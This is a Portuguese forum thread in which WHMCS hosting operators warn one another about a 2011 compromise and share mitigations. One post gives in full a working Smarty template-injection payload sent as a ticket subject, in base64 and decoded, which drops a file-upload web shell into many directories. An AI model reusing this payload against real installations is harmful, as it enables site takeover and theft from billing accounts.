Atenção! Falha de segurança no WHMCS

[eloimarquessilva]

Prezados,

hoje estava instalando um modulo da VPS.NET em meu WHMCS e notei um arquivo estranho "jxh.php" verificando a data notei que coincide com a data em que começei a receber uns SPAMs no WHMCS. Acredito que isso tem a ver com a falha de segurança reportada no dia 1/12/2011 porem foi tarde a atualização.

Fizeram um dump nas tabelas do WHMCS sorte minha que as senhas dos clientes são criptografadas.

Mesmo assim providenciei a troca de senhas e dos HASHS de integração com o cPanel.

Procurem por este arquivo em seus servidores.

----

Joia acabei de achar mais arquivos inclusive um pra desencriptar senhas do WHMCS.

E outro pra roubar senhas dos domínios.

abuhalil.php

dw.php

hot.php

Editado Dezembro 23, 2011 por eloimarquessilva

[Cassiano Teixeira]

Em qual diretorio voce achou esses arquivos?

[eloimarquessilva]

Nossa vários...

Fui achando em tanto lugar que por fim exclui a pasta inteira do whmcs e subi tudo de novo

Agora vou subir os modulos de cobrança.

[Cassiano Teixeira]

Entendi. Bom, eu procurei e pelo menos no meu não encontrei (Graças a DEUS) - Valeu ai pela alerta;

[eloimarquessilva]

Encontrei por onde o ataque ao meu WHMCS entrou.

O cara abriu um ticket no suporte com este subject:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigianhoLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw0KJGFyPWV4cGxvZGUoIlxuIiwiYWRtaW4NCmF0dGFjaG1lbnRzDQpkb3dubG9hZHMNCmltYWdlcw0KaW5jbHVkZXMNCmxhbmcNCm1vZHVsZXMNCm9yZGVyDQpwaXBlDQpzdGF0dXMNCnRlbXBsYXRlcw0KdGVtcGxhdGVzX2MNCndpZGdldHMNCiIpOw0KDQpmb3JlYWNoKCRhciBhcyAka2V5ID0+ICR2YWwpDQp7DQokZm8gPSBmb3Blbih0cmltKCR2YWwpLiIvanhoLnBocCIsInciKTsgZndyaXRlKCRmbywkY29kZSk7DQp9'));{/php}

Que decodificando faz isso:

$code = base64_decode("<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

	else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>");

$fo = fopen("jxh.php","w");

fwrite($fo,$code);

$ar=explode("\n","admin

attachments

downloads

images

includes

lang

modules

order

pipe

status

templates

templates_c

widgets

");


foreach($ar as $key => $val)

{

$fo = fopen(trim($val)."/jxh.php","w"); fwrite($fo,$code);

}

Daí pra frente ele consegue upar qualquer arquivo que quiser para dentro site.

Basicamente para se previnir deste ataque em especifico mova sua pasta templates_c para o "Home Directory" do seu site e deixe todas as demais pastas do WHMCS sem permissão de escrita. Isso deve avacalhar algumas funcionalidades como upload de arquivos etc (não testei a implicação disto ainda).

O problema que vejo é que o Matt não divulga o que as correções estão corrigindo e assim eu não sei se a correção que apliquei previne deste ataque ou nao.

Editado Dezembro 23, 2011 por eloimarquessilva

[chuvadenovembro]

Eloi, eu fiquei meio perdido porque havia uma atualização de novembro e logo em dezembro saiu outra, acho que é necessário aplicar as duas.

Outra coisa, recomendaria habilitar o open_basedir e também fazer uma varredura com aquele maldet que eu abri um tópico aqui sugerindo...acho que vai ajudá-lo a encontrar scripts maliciosos.

Boa sorte por ai.

[Lperez]

Fiquem espertos com esse codigo malicioso, essa semana recebi esse codigo através de um ticket, acabei apenas fechando o ticket ao invés de apagar.

E hoje a coisa fedeu, recebi um email do pagseguro informando que havia feito um pagamento no valor de R$430,00 que eu não havia feito para uma tal pessoa, liguei imediatamente no pagseguro e abri um chamado informando que não fiz esse pagamento.

Mas para minha surpresa, tentei acessar meu email de cadastro do pagseguro e não consegui, tentei acessar o WHM da minha revenda e não consegui, tentei acessar o Moip e não consegui, o camarada trocou todas minhas senhas, a minha sorte foi que no Moip e Pagseguro tenho outras contas de emails cadastradas a acabei recebendo o email de notificação da transação.

Estou utilizando o whmcs na versão 4.4.2 posso migrar diretamente para versão recente?

Como posso identificar os arquivos maliciosos no diretorio do whmcs?

Já troquei todas as senhas, mas ainda estou meio perdido, o que devo fazer?

Obrigado!

[eloimarquessilva]

Eu baixei o WHMCS todo de novo no site do desenvolvedor.

Ele já vem com as atualizações.

[eloimarquessilva]

Olha eu vou dizer pra vocês com toda sinceridade.

Eu achei essa falha de segurança GRAVÍSSIMA e de gente muito AMADORA. Sinceramente acho que os desenvolvedores do WHMCS estão muito longe de serem bons desenvolvedores. O cara conseguir executar um código malicioso através da SMARTY? Francamente isso é um erro grotesco de desenvolvimento.

E olha que nem parei pra analisar mais afundo... estou realmente com medo de usar o WHMCS.

[hostbr]

Espero que a versão 5 acima ainda esteja longe de ter esse problema.